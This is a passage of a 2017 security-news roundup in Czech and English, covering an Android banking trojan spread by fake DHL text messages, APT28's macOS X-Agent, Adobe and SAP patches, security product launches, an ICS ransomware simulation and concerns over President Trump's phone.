U nás se však uživatelé budou setkávat především s lokalizovanou variantou upravenou pro české uživatele. V případě posledního útoku, který využívá jméno přepravce DHL jde čistě o phishing, kdy je po otevření aplikace zobrazen přihlašovací formulář do internetového bankovnictví ČSOB. V případě, že uživatel zadá svoje identifikační číslo a kód PIN, útočníci už mají jednoduchou práci. I k případné ověřovací SMS totiž mají přístup díky udělenému oprávnění číst zprávy.
Pokud uživatel spustí aplikaci, naservíruje mu přihlašovací formulář do internetového bankovnictví. K ověřovací SMS už má také přístup a v napadení účtu mu po zadání údajů nic nebrání (foto: ČSOB)
Aktuálně hrozí trojan Android/Spy.Banker především ve východní Evropě, což je vidět také na mapě společnosti Eset. K jeho rozšíření však došlo už na podzim loňského roku, kdy byl ve své původní podobě využíván pro krádeže přihlašovacích údajů do bankovnictví v Německu, Francii či Rakousku a v menší míře Polsku či Spojených státech.
Aktuálně se malwaru Android/Spy.Banker daří hlavně ve východní Evropě, nejvíc v Rusku a na Slovensku (foto: Eset)
Aktuální vlna útoků je nebezpečná především pečlivou lokalizací – ať už se týká jak doručovaných zpráv, v nichž nenajdeme chyby, tak již zmíněných domén, které se opravdu tváří jako oficiální. Pokud jste aplikaci spustili a zadali do ní údaje, neváhejte s kontaktováním zákaznické linky vaší banky. Aplikaci odinstalujte běžným způsobem v nastavení Androidu a nabídce Aplikace. Velmi často nese název Flash Player 10 Update, v některých případech však útočníci změnili i jméno na DHL nebo Česká pošta.
Signal Messaging App Rolls Out Encrypted Video Calling
15.2.2017 thehackernews Apple
WhatsApp and Facebook have so far the largest end-to-end encrypted video calling network of all, but now another popular end-to-end encrypted messaging app recommended by whistleblower Edward Snowden is ready to give them a really tough competition.
The Signal app, which is widely considered the most secure of all other encrypted messaging apps, released video calling feature on Tuesday for both Android and iOS in a new update.
Developed by open source software group Open Whisper System, Signal is a free and open source messaging application specially designed for Android and iOS users to make secure and encrypted messages and voice calls.
Even the Signal Protocol powers the end-to-end encryption built into WhatsApp, Facebook Messenger, and Google Allo's Incognito mode as well.
Signal has already been providing fully end-to-end encrypted chat and voice calling features, but the newly added feature will make it even easier for privacy conscious people to convey their information face-to-face through video calling without compromising security.
Watch Out! There's a Privacy issue too!
This new video calling feature also comes with support for CallKit on iOS 10 devices, a new framework that makes Signal act more like the regular phone app.
Callkit in iOS 10 allows Signal users to answer calls from with one touch through their device's lock screen and lists those calls on the device's native "Recent Calls" just like regular calls, possibly making it inconvenient for privacy-minded people.
CallKit is optional, and if users decide to opt-in this feature, some of their data might sync to Apple's iCloud servers, including who the Signal users called and how long they had the conversation, Signal's pseudonymous lead designer Moxie Marlinspike explains in a blog post.
The CallKit feature can be turned off within your iOS device's settings to enhance your privacy.
Currently, Signal’s video calling feature is in beta, which means both users will have to enable the feature for video calling to work manually.
To try out video calling in Signal, you will have to go into your Signal settings and enable 'Video calling beta' under 'Advanced.'
BitDefender found the first MAC OS version of the X-Agent used by the APT28
15.2.2017 securityaffairs APT
Security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at BitDefender have discovered a MAC OS malware program that’s likely part of the arsenal of the dreaded Russian APT 28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during 2016 Presidential election.X-Agent APT 28
The researchers believe the group has developed a malware called Sofacy or X-Agent that was associated only with its espionage campaigns.
The experts observed several strains of the X-Agent specifically designed to compromise Windows, Linux, iOS and Android OSs.
Now researchers at Bitdefender have spotted the first version of the X-Agent that was developed to compromise MAC OS systems.
The security firm hasn’t revealed how it has discovered the MAC OS version of the X-Agent, and currently, there is no information on the attack chain.
“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.
The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.
The X-Agent malware is able to load additional modules, it could be used as backdoor or to perform a reconnaissance on the target system by gathering information of hardware and software components of the target host.
In September 2016, Palo Alto researcher Ryan Olson, discovered that Fancy Bear used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.
““The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by PaloAlto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.””
The Komplex malware has numerous similarities with the Carberp trojan, it was improved to gain access on PC and OS X systems and use the same command-and-control server.
The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.
The new MAC OS X-Agent leverages domain names similar to the one used by Komplex Trojan, they only differ for the TLD. The researchers noticed identical project path strings inside both the Komplex and X-Agent samples, a circumstance that suggests the involvement of the same development team.
“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.
Summarizing, the Komplex component discovered in September 2016 has been exclusively used as a downloader and installer for the X-Agent binary.
The investigation is ongoing … stay tuned!
Adobe just fixed thirteen code execution flaws in Flash Player
15.2.2017 securityaffairs Vulnerebility
Adobe addressed thirteen highest severity code execution vulnerabilities in Flash Player for Windows, MAC OS, and Chrome.
Adobe released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions, and the Campaigns marketing tool.
Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. The updates address critical vulnerabilities that could be exploited by an attacker to take control of the vulnerable system.
Flash Player 24.0.0.221 addressed 13 critical code execution flaws, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the Adobe Security Advisory for the Flash product.
The flaws were discovered by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs who reported the security issued to Adobe.
Nine flaws affecting the Digital Editions ebook reader were also fixed by Adobe with the release of version 4.5.4 for Windows, Mac, and Android.
Adobe fixed several kinds of vulnerabilities including a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.
The flaws were discovered by the researcher Steven Seeley of Source Incite and Ke Liu of Tencent’s Xuanwu LAB.
“Adobe has released a security update for Adobe Digital Editions for Windows, Macintosh and Android. This update resolves a critical heap buffer overflow vulnerability that could lead to code execution and important buffer overflow vulnerabilities that could lead to a memory leak.” reads the Adobe Security Advisory for the Digital Editions product.
Adobe Flash Player flaws
The last set of flaws was affecting the Adobe Campaign product for Windows and Linux, the release of Adobe Campaign 6.11 addresses a moderate severity security bypass flaw affecting the client console. The flaws could be exploited by an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.
The experts also fixed another flaw in the latest version of Campaign, it is a moderate severity input validation issue that can be exploited for cross-site scripting (XSS) attacks. The flaws were reported to Adobe by researcher Léa Nuel.
“Adobe has released a security update for Adobe Campaign v6.11 for Windows and Linux. This update resolves a moderate security bypass affecting the Adobe Campaign client console. An authenticated user with access to the client console could upload and execute a malicious file, potentially resulting in read and write access to the system (CVE-2017-2968). This update also resolves a moderate input validation issue that could be used in cross-site scripting attacks (CVE-2017-2969).” reads the Adobe Security Advisory for the Adobe Campaign product.
SAP Patches 22 Vulnerabilities With February 2017 Security Updates
14.2.2017 securityweek Vulnerebility
SAP on Tuesday announced the release of its February 2017 security updates, which includes 15 Patch Day Security Notes and 3 updates to previously released Patch Day Security Notes.
Only High risk and Medium severity vulnerabilities were addressed this month, with the highest CVSS score of the vulnerabilities being 8.5. Multiple patches were released for SAP's HANA database management system.
According to ERPScan, a company specialized in securing SAP and Oracle products, SAP’s February 2017 Security Patch Day also saw the release of 7 Support Package Notes, for a total of 22 patches across products. 7 of the patches were rated High risk, while the remaining 15 were assessed as Medium severity.
The most common vulnerability type addressed this month is Missing Authorization check (5 patches), followed by Cross-Site Scripting (4 patches), denial of service (3 patches), and XML external entity (2 patches). The remaining 8 flaws include: directory transversal, implementation flaw, privilege escalation, buffer overflow, ABAP code injection, cross-site request forgery, clickjacking, and multiple issues.
The most important issues addressed this month include a Missing Authorization Check vulnerability (CVSS Base Score: 8.5) in SAP Netweaver Data Orchestration (which could allow an attacker to access the service without authorization and use service functionality that has restricted access), along with an Implementation flaw vulnerability (CVSS Base Score: 8.2) in SAP GRC Access Control EAM (which can cause unpredictable behavior of a system, troubles with stability and safety).
Additionally, SAP patched a Memory Corruption vulnerability (CVSS Base Score: 8) in SAP 3D Visual Enterprise Author, Generator and Viewer, which could allow an attacker to inject a specially crafted code into a working memory which will be executed by the vulnerable application (the executed commands run with the same privileges as the service that executed the command).
Three of the issues were disclosed by ERPScan researchers, including multiple vulnerabilities in SAP HANA (CVSS Base Score: 8.3) – namely a denial of service that could allow an attacker to crush a process of a vulnerable component, and an Implementation Flaw (insecure default user creation policy) in third-party repository server Sinopia –, and an XML external entity vulnerability in SAP Visual Composer VC70RUNTIME (CVSS Base Score: 6.5).
The vulnerabilities in SAP HANA can be exploited together, ERPScan says: “The first vulnerability allows an attacker to create a new user over the Internet without authentication. After that, an adversary can create a new repository. If a package name contains special characters, the server will crash. As a result of the attack, the project would be unavailable meaning a stoppage of developing processes. Moreover, the vendor’s advisory states that other SAP HANA XS components also could be potentially impacted.”
In related news, Microsoft announced on Tuesday that a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.
ExtraHop Introduces Real Time Wire-Level Threat Detection
14.2.2017 securityweek Safety
IT analytics firm ExtraHop Networks today announced ExtraHop Addy, a cloud-based machine-learning wire data analytical tool that is being trained to automatically detect anomalies on the fly as they are happening.
Seattle, Washington-based ExtraHop was born in 2007. It was founded by senior architects Raja Mukerji and Jesse Rothstein, formerly from F5 Networks, with a vision of tapping wire data to provide the most complete and definitive information on the current state of the IT infrastructure. Since then ExtraHop has picked up hundreds of global customers, including Sony, Lockheed Martin, Microsoft, Adobe, and Google.
But the working of the infrastructure is not the only diagnosis that can be drawn from wire data. Wire data has been described by Rothstein as "everything on the network, from the packets to the payload of individual transactions. It is a very deep, very rich source of data... And it's definitive." Inevitably, within that data, are any and all subtle indications of cyber security compromise.
Machine-learning threat detection tools are not new. For the most part, however, they are high-speed forensic tools that rapidly analyze huge volumes of log data -- they can tell you what happened, but not necessarily what is happening.
Addy is a new SaaS offering that takes the data already derived from ExtraHop Network and analyzes it in the cloud. It builds a continuous baseline of normal behavior for every device on the network; it then analyzes what is happening against what it would expect to happen; and it highlights anomalies or issues to the IT team -- or the security team. This takes its potential beyond IT infrastructure monitoring into real time threat detection.
Early access customers have already demonstrated Addy's security value. One large cable company detected a server unexpectedly probing other systems in the datacenter; and were immediately able to shut down the compromised server. A financial services firm was able to detect the Dyn DDoS attack in real time and route DNS traffic through an unaffected region to avoid downtime. And a national medical institution averted two potential security breaches when Addy detected international servers probing their DNS, as well as reverse DNS lookups.
Addy learns from both the customer's own environment and also crowd-sourced domain expertise. This means that the behavioral baseline for every device in the network is continuously improving, the accuracy of alerts is increasing, and false positives are minimized.
For the most part, the wire data sent to the cloud for analysis is kept in customer-specific compartments. Although that data includes nothing personally identifiable, this is an added assurance for customers concerned with any form of network data sharing, or are otherwise concerned about the evolving data protection laws.
"ExtraHop provides a real-time view across the entire IT environment," explains Rothstein. "With Addy, we're taking the next step, applying machine learning techniques to this vast data set while leveraging the scale, elasticity, and compute power of the cloud."
Addy is available through an Early Access Program for select participants now, and will be available generally in April 2017.
Last Minute Issue Delays Microsoft Security Updates
14.2.2017 securityweek Vulnerebility
Microsoft has apologized to customers “for any inconvenience” after a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.
“Our top priority is to provide the best possible experience for customers in maintaining and protecting their systems. This month, we discovered a last minute issue that could impact some customers and was not resolved in time for our planned updates today,” Microsoft said. “After considering all options, we made the decision to delay this month’s updates.”
The security updates released by the company for January 2017 consisted of only four bulletins, including one for Flash Player fixes. It is unclear how many flaws will be patched this month, but many hope Microsoft will address the recently disclosed denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.
Starting with this month, Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide. For January, the company published both security bulletins and some release notes in the Security Updates Guide.
Microsoft has recently introduced a new patch process that includes a Monthly Rollup, which contains both security and non-security fixes, a preview of the Monthly Rollup, and security-only updates.
In order to reduce the size of the security-only update, starting with this month, Internet Explorer patches will be made available as a separate update. The Monthly Rollup will include all patches, including the ones for IE.
The decision to separate the browser updates was made after users asked Microsoft to provide increased flexibility by allowing them to independently deploy Windows and Internet Explorer patches.
Johannes B. Ullrich, dean of research at the SANS Technology Institute, speculated that this change in process may have caused this month’s delay.
Simulation Shows Threat of Ransomware Attacks on ICS
14.2.2017 securityweek Virus
Researchers at the Georgia Institute of Technology have demonstrated the potential impact of ransomware on industrial control systems (ICS) by simulating an attack aimed at a water treatment plant.
David Formby, a Ph.D. student in the Georgia Tech School of Electrical and Computer Engineering, and his faculty advisor, Raheem Beyah, identified several commonly used programmable logic controllers (PLCs) and tested three of them to determine how easily they can be hacked.
Once the devices were tested, including their password security and susceptibility to unauthorized configuration changes, the experts combined them with tubes, pumps and tanks in order to simulate a water treatment facility.
The attack simulation shows how an attacker with access to the PLCs can close valves, display false information to the operator, and increase the amount of chlorine added to the water.
“We were able to simulate a hacker who had gained access to this part of the system and is holding it hostage by threatening to dump large amounts of chlorine into the water unless the operator pays a ransom,” Formby said. “In the right amount, chlorine disinfects the water and makes it safe to drink. But too much chlorine can create a bad reaction that would make the water unsafe.”
Formby and Beyah discovered 1,400 instances of a single PLC type being accessible from the Internet, and pointed out that the organizations housing them often believe the devices are not vulnerable to attacks.
Related: Exploring Risks of IT Network Breaches to Industrial Control Systems (ICS)
Ransomware attacks typically target data, even if the victim is a critical infrastructure organization. Last year, the Board of Water and Light (BWL) in Lansing, Michigan, was targeted with ransomware, but the attack affected its corporate network and there was no disruption to water or energy supplies.
However, Formby, Beyah and other experts believe profit-driven cybercriminals could increasingly attack ICS, especially since these systems are often poorly protected.
Experts recently raised concerns about ransomware being brought into the industrial domain when KillDisk, a disk-wiping malware used in high-profile attacks aimed at ICS, had been modified to include ransomware capabilities.
HPE Launches Threat Investigation, IoT Data Security Products
14.2.2017 securityweek Security
Hewlett Packard Enterprise (HPE) announced on Tuesday the launch of a new threat investigation solution, ArcSight Investigate, and a new SecureData product for IoT and big data.
HPE Security ArcSight Investigate is a product designed to provide security operations center (SOC) teams fast and intuitive search functionality to help them identify and respond to significant threats.
ArcSight Investigate can be integrated with Hadoop and other ArcSight products, including Data Platform (ADP) and Enterprise Security Manager (ESM).HPE
The product is expected to become generally available in the second quarter. In the meantime, organizations interested in ArcSight Investigate can sign up for the early access program.
HPE has also unveiled SecureData for Hadoop and IoT. The product enables organizations to secure IoT data at rest, in transit and in use through integration with the Apache NiFi data processing and distribution platform.
As for protecting big data, HPE SecureData for Hadoop and IoT integrates with Hortonworks DataFlow (HDF) in order to secure information throughout the dataflow management and streaming analytics process. HPE says the original format of the encrypted data is preserved for processing and enabling secure big data analytics.
“While IoT and big data analytics are driving new ways for organizations to improve efficiencies, identify new revenue streams, and innovate, they are also creating new attack vectors for leaking sensitive information to adversaries,” said HPE’s Albert Biketi. “HPE SecureData enables business users to easily build data security in, delivering persistent protection in IoT and big data ecosystems, and allowing organizations to securely innovate.”
HPE SecureData for Hadoop and IoT is generally available worldwide as part of the company’s SecureData offering.
IBM's Watson Aims its Power at Security Operations Centers
14.2.2017 securityweek Security
Insider IBM's Cyber Range in Cambridge MA
Watson for Cyber Security Integrates With IBM's New Cognitive Security Operations Center
The power of IBM's cognitive computing Watson has been directed at cyber security. For the last year, Watson has been absorbing the collective knowledge of a million cyber security studies, scientific reports and analyses. Now Watson is ready to stand behind the shoulders of the analysts that sift through the network alerts thrown up by the QRadar security intelligence platform in what IBM calls its Cognitive SOC.
Watson's purpose is to advise the analysts. It gains its knowledge through parsing the free text documents that hold the greater part of the world's security knowledge. Human analysts could never read the volume of data that is available -- but it is light work for a machine. Watson takes free text documents and parses them; absorbing key knowledge and relationships. Some of the data it absorbs could be wrong; but Watson relies on the power of collective crowd knowledge to sift the wheat from the chaff. The result is a huge and accessible corpus of security expertise.
IBM LogoThe human analysts are also struggling with the sheer volume of events coming from their security intelligence platform. According to IBM, security teams must sift through up to 200,000 security events every day. Most of these are false positives that still need to be checked; but the result is up to 20,000 hours wasted every year. This is expected to double over the next five years.
Given the dearth of analysts, and especially the sparsity of expert analysts, this is a problem that will only get worse. Security intelligence platforms, such as QRadar, can generate huge volumes of warnings -- they create their own subset of Big Data. But the bloom of Big Data is wearing thin: the haystack is getting bigger, but mostly it just makes finding the needle harder.
Watson hides its own big data of knowledge within the machine, and then uses the power of the machine to direct the analyst to more targeted threat hunting in the QRadar alerts. The new app, IBM QRadar Advisor with Watson, is the first tool to tap Watson's security insights; and is already being used by 40 IBM customers including Avnet, University of New Brunswick, Sogeti.
"Today's sophisticated cybersecurity threats attack on multiple fronts to conceal their activities, and our security analysts face the difficult task of pinpointing these attacks amongst a massive sea of security-related data," explains Sean Valcamp, Chief Information Security Officer at Avnet.
"Watson makes concealment efforts more difficult by quickly analyzing multiple streams of data and comparing it with the latest security attack intelligence to provide a more complete picture of the threat. Watson also generates reports on these threats in a matter of minutes, which greatly speeds the time between detecting a potential event and my security team's ability to respond accordingly."
While Watson and QRadar are the key elements of the Cognitive SOC, IBM is extending it to the endpoint with the announcement of BigFix Detect. This is an endpoint detection and response (EDR) solution designed to detect and respond to malicious behavior in endpoints.
"The Cognitive SOC is now a reality for clients looking to find an advantage against the growing legions of cybercriminals and next generation threats," said Denis Kennelly, Vice President of Development and Technology, IBM Security. "Our investments in Watson for Cybersecurity have given birth to several innovations in just under a year. Combining the unique abilities of man and machine intelligence will be critical to the next stage in the fight against advanced cybercrime."
IBM is planning to improve the analyst (man) Watson (machine) interface with a new research project code-named Havyn -- a voice-powered security assistant that will make Watson respond to the analysts' verbal commands and natural language. IBM is not the only vendor seeking to use natural language as the interface between man and machine. Earlier this month Dynatrace announced Davis focused on monitoring the IT ecosystem. "It gives," announced the firm, "non-technical teams the ability to monitor and understand network health and performance issues via familiar communication tools. 'davis' has effectively 'consumerized' IT – this is an industry first."
Similarly, Endgame announced Artemis in late January. Artemis is a natural language chat interface between analysts and the Endgame Detect and Respond platform. The purpose behind Havyn, Davis and Artemis is to reduce the time spent by analysts in hunting out threats.
The IBM Cognitive SOC can be built on premise or built in the cloud through IBM Managed Security Services.
In November 2016, IBM Security unveiled a new global headquarters in Cambridge, Massachusetts, which features a physical Cyber Range designed to allow organizations in the private sector to prepare for and respond to cyber threats.
Qualys Expands Detection, Web App Security, and Data Sharing Portfolio
14.2.2017 securityweek Security
SAN FRANCISCO - RSA CONFERENCE 2017 - Cloud-based security and compliance solutions provider Qualys this week announced new tools and features to provide customers with improved detection capabilities, expanded web application security features, and improved vulnerability data sharing.
Qualys added two new detection solutions to its Cloud Platform, in the form of Qualys File Integrity Monitoring (FIM) and Indicators of Compromise (IOC), both meant to deliver more critical security and compliance functions in a single cloud-based dashboard. FIM and IOC bring to the Qualys Cloud Agent a combination of prevention and detection by adding continuous visibility of breaches and system changes to the single-pane view of security and compliance posture that the Agent already offers.
Qualys FIM was designed to log and centrally track file change events across global IT systems, while offering a single-view dashboard for identifying critical changes, incidents, and audit risks caused by various factors, including normal patching and administrative tasks, change control exceptions or violations, and malicious activity.
A cloud-based solution, FIM doesn’t require the deployment and maintenance of complex security infrastructure, which also results in improved compliance, reduced downtime, and limited damage from compromise. With FIM, customers get features such as out-of-the-box profiles based on industry best practices and vendor-recommended guidelines, real-time change engine to monitor files and directories specified in the monitoring profile, and automated change reviews of workflows.
Qualys IOC, on the other hand, continuously monitors endpoint activity for suspicious activity that could signal the presence of known malware, unknown variants, and threat actor activity on devices both on and off the network. The solution brings together endpoint detection, behavioral malware analysis, and threat hunting techniques, the company says.
Qualys IOC provides customers with continuous event collection through Cloud Agent's data collection and delta processing techniques, as well as with highly scalable detection processing (as analysis, hunting, and threat indicator processing are performed in the cloud). Moreover, the solution offers actionable intelligence for security analysts, to help them prioritize responses for critical business systems.
According to Qualys, security administrators will benefit from multiple enhancements that FIM and IOC bring to the Cloud Agent and cloud-based processing platform, including easy setup and no maintenance needs (modules can be instantly activated), minimal impact on performance (the Cloud Agent monitors file changes and system activity locally but sends all data to the Cloud Platform), unified security posture (FIM and IOC alert data is presented in a single, integrated view), and integration with AssetView (providing dynamic dashboards, interactive and saved searches, and visual widgets to analysts).
“Breaches continue to rise despite the investments in traditional mechanisms that organizations have deployed to support their businesses in the new era of digital transformation. Our new disruptive services for FIM and IOC extend the capabilities of our Cloud Agent platform, allowing companies to get the visibility and prevention they need against cyber threats from one single platform, drastically reducing their security costs,” Philippe Courtot, chairman and CEO, Qualys, said.
Expanded web application security offerings
With the release of Qualys Web Application Scanning (WAS) 5.0 and Web Application Firewall (WAF) 2.0 this week, the company added new functionality to its web application security offerings, in an attempt to provide customers with scalable fast scanning, detection and patching of websites, mobile applications and Application Programming Interfaces (APIs), in one unified platform.
The newly released WAS 5.0 offers not only programmatic scanning of Simple Object Access Protocol (SOAP) APIs, but also the testing of REpresentational State Transfer (REST) API services, Qualys announced. Moreover, it delivers scanning of IoT (Internet of Things) services and mobile apps, as well as API-based business-to-business connectors, and can automatically load-balance scanning of multiple applications across a pool of scanner appliances for efficiency. Moreover, improvements made to Progressive Scanning allow customers to scan very large sites, one slice at a time, to cover large applications that are problematic to scan in a short window.
WAF 2.0, on the other hand, offers one-click virtual patching feature to address both false-positives and the inability to quickly patch vulnerabilities; out-of-the-box security templates for popular platforms such as Wordpress, Joomla, Drupal and Outlook Web Application; and support for VMWare, Hyper-V, and Amazon Web Services, along with features such as load-balancing of web servers, health checks for business-critical web applications, custom security rules based on HTTP request attributes, reusable Secure Socket Layer profiles, detailed event log information, and centralized management.
Both Qualys WAS 5.0 and WAF 2.0 are available now as annual subscriptions. Pricng for Qualys WAS starts at $1,695 for small businesses and $2,495 for larger enterprises, while pricing for the WAF soluton starts at $1,995 for small businesses and $9,995 for larger enterprises.
Vulnerability data sharing
In addition to the expanded portfolio, Qualys also announced a partnership with crowdsourced security testing company Bugcrowd to allow joint customers to share vulnerability data across automated web application scanning and crowdsourced bug bounty programs.
The joint integration between Bugcrowd Crowdcontrol and Qualys Cloud Platform brings together automated web application scanning (WAS) and penetration-testing crowd in a single solution. Thus, joint customers should be able to eliminate vulnerabilities discovered by Qualys WAS from their list of offered bug bounties, while focusing on Bugcrowd programs and critical vulnerabilities that require manual testing.
The initial stage in this collaboration allows Bugcrowd customers who also have Qualys WAS to import vulnerability data into the Bugcrowd Crowdcontrol platform and use it to optimize their bug bounty program scope and incentives. In the future, joint customers running a bug bounty platform on Bugcrowd will be able to import unique vulnerabilities from Crowdcontrol into Qualys WAS and apply one-click patches through the fully integrated Qualys Web Application Firewall.
“With the move of IT to the cloud and all the digital transformation efforts underway, web apps are exploding and securing these apps is now front and center. By combining the automation of Qualys Web Application Scanning (WAS) and Bugcrowd's crowd sourcing platform, organizations can now cover a much larger number of applications and secure them more effectively at a lower cost,” Sumedh Thakar, Chief Product Officer, Qualys, said.
Senators Launch Query on Trump's Smartphone Security
14.2.2017 securityweek Mobil
Washington - Two US senators have requested details on President Donald Trump's smartphone security, saying he could jeopardize national secrets if he is still using his old handset, as some reports say.
"Did Trump receive a secured, encrypted smartphone for his personal use on or before Jan. 20? If so, is he using it?," said a tweet Tuesday by Senator Tom Carper, who along with fellow Democrat Claire McCaskill released a letter to the administration requesting information on the president's device.
"Trump should be well aware by now of the appropriate and necessary protocol to safeguard our nation's secrets."
The letter from the two lawmakers, dated February 9, was sent to Defense Secretary James Mattis along with Homeland Security chief John Kelly and the National Security Agency director Michael Rogers. The senators released the letter late Monday.
The lawmakers said they were concerned by reports that Trump was still using an Android device that may be several years old for his frequent personal Twitter messages.
"While it is important for the president to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records," the letter said.
"The national security risks of compromising a smartphone used by a senior government official, such as the president of the United States, are considerable."
The New York Times reported last month that while Trump had received a new, secure device after his inauguration, he still relied on his older device despite protests from aides.
That report prompted a flurry of comments from security experts who argued that the president would be inviting danger by using his old personal phone.
Trump's smartphone "would probably be the most widely prized device on the internet for hackers -- and top of the target list for intelligence agencies around the world," said independent security researcher Graham Cluley in a blog post Tuesday.
Last month, Nicholas Weaver of the International Computer Science Institute in Berkeley, California, warned that "Trump's continued use of a dangerously insecure, out-of-date Android device should cause real panic."
Writing on the Lawfare blog, Weaver noted that hackers could gain access to the phone's location as well as its microphone and camera and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services and is actively being exploited."
Over a Dozen Code Execution Flaws Patched in Flash Player
14.2.2017 securityweek Vulnerebility
Adobe on Tuesday released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions and the Campaigns marketing tool, but none of the flaws have been exploited in the wild.
Flash Player 24.0.0.221 patches 13 critical vulnerabilities that can be exploited for arbitrary code execution, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.
The security holes were reported to Adobe by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.
In the Digital Editions ebook reader Adobe fixed nine flaws with the release of version 4.5.4 for Windows, Mac and Android. The patched vulnerabilities include a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.
A majority of the flaws were reported to Adobe by Steven Seeley of Source Incite, but the critical issue was identified by Ke Liu of Tencent's Xuanwu LAB.
With the release of Adobe Campaign 6.11 for Windows and Linux, the vendor patched a moderate severity security bypass flaw affecting the client console. The weakness allows an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.
A second flaw addressed in the latest version of Campaign is a moderate severity input validation bug that can be exploited for cross-site scripting (XSS) attacks. The vulnerabilities were reported to Adobe by researcher Léa Nuel.
Senators want more info on Trump’s personal phone and its defense
14.2.2017 securityaffairs Mobil
Two US senators want detailed info on Trump’s personal phone and the way the Defense Information Systems Agency (DISA) will protect it.
Recently security experts warned of the risk of cyber attacks on Trump’s personal phone that may be open to hackers.The news of Trump’s use of an Android smartphone was first reported by The New York Times.
The American President Trump is still using his personal insecure Android smartphone and at the end of January, the researcher who goes online with moniker @WauchulaGhost reported his Twitter account is exposed to the risk of hack due to security misconfigurations.
The official @POTUS Twitter account was linked to a private Gmail account owned by President Trump.
News of the day is that two senators have written to the U.S. Department of Defense requesting more info about the fact that President Donald Trump may still be using an unsecured Android phone.
“We write today regarding the security concerns stemming from President Donald Trump’s reported use of his personal, unofficial, smartphone. Public reports originally indicated that President Trump began using a “secure, encrypted device approved by the U.S. Secret Service” prior to taking office. Subsequent reports, however, suggest that President Trump may still be using his personal smartphone, an “old, unsecured Android phone.“” reads the letter sent by Tom Carper, a Democrat from Delaware, and Claire McCaskill, a Democrat from Missouri.
“While it is important for the President to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records,”
Senators fear that nation-state actors could hack into the Trump’s personal phone and could access sensitive information.
“These reports are very troubling because security risks associated with the use of an unsecured phone include hackers’ ability to access the device to turn on audio recording and camera features, as well as engaging surveillance tools that allow location and other information tracking features” continues the letter.
Attackers can exploit security flaws in Trump’s personal phone to spy on its communication, for this reason, the national security agencies discourage the use of personal mobile devices.
“DoD policies, operational constructs, and security vulnerabilities currently prevent the adoption of devices that are unapproved and procured outside of official government acquisition.” reads the Department of Defense’s 2013 Commercial Mobile Device Implementation Plan cited by the senators in the letter.
The senators’ request for a written response on what kind of device President Trump is using for its communication, they desire to have more information about the initiative of the Defense Information Systems Agency (DISA) to protect Presidential communications.
They want to know if the DoD agency has written specific policies and procedures to mitigate the risks related to the use of the Trump’s personal phone.
V Česku se přes SMS šíří nebezpečný malware
14.2.2017 SecurityWorld Viry
První případy nové vlny útoků na banky v Česku a Slovensku prostřednictvím mobilního bankovnictví zachytili analytici Esetu. Kyberútočníci použili malware pro Android, který lokalizovali na tuzemské uživatele a k jeho šíření využili klasické SMS zprávy.
Na Česko cílí nová vlna malware, který se šíří podvodnými zprávami SMS. Podle aktuálních informací se útočníci prozatím zaměřili jen na ČSOB. Dá se však očekávat, že okruh cílových bank se brzy rozšíří, tvrdí Lukáš Štefanko z Esetu.
Škodlivý kód typu trojan pro platformu Android je novou variantou již známé rodiny malware, která se v závěru ledna šířila prostřednictvím falešných SMS zpráv, předstírajících komunikaci České pošty nebo obchodu Alza.cz.
Malware Android\Trojan.Spy.Banker.HV uživateli při otevření internetového bankovnictví podsune falešnou přihlašovací stránku. Nepozorný uživatel tak nevědomky odešle své přihlašovací údaje podvodníkům a vystaví se hrozbě vykradení účtu.
V aktuální útočné kampani, která probíhá v Česku a na Slovensku, je tento nebezpečný malware šíří pomocí SMS s odkazem na údajnou aplikaci společnosti DHL, která však stáhne podvodnou aplikaci s názvem „Flash Player 10 Update“ a ikonou společnosti DHL.
Přestože název aplikace útočníci změnili, ikonu zatím nikoli, což při instalaci v českém nebo slovenském prostředí působí podezřele.
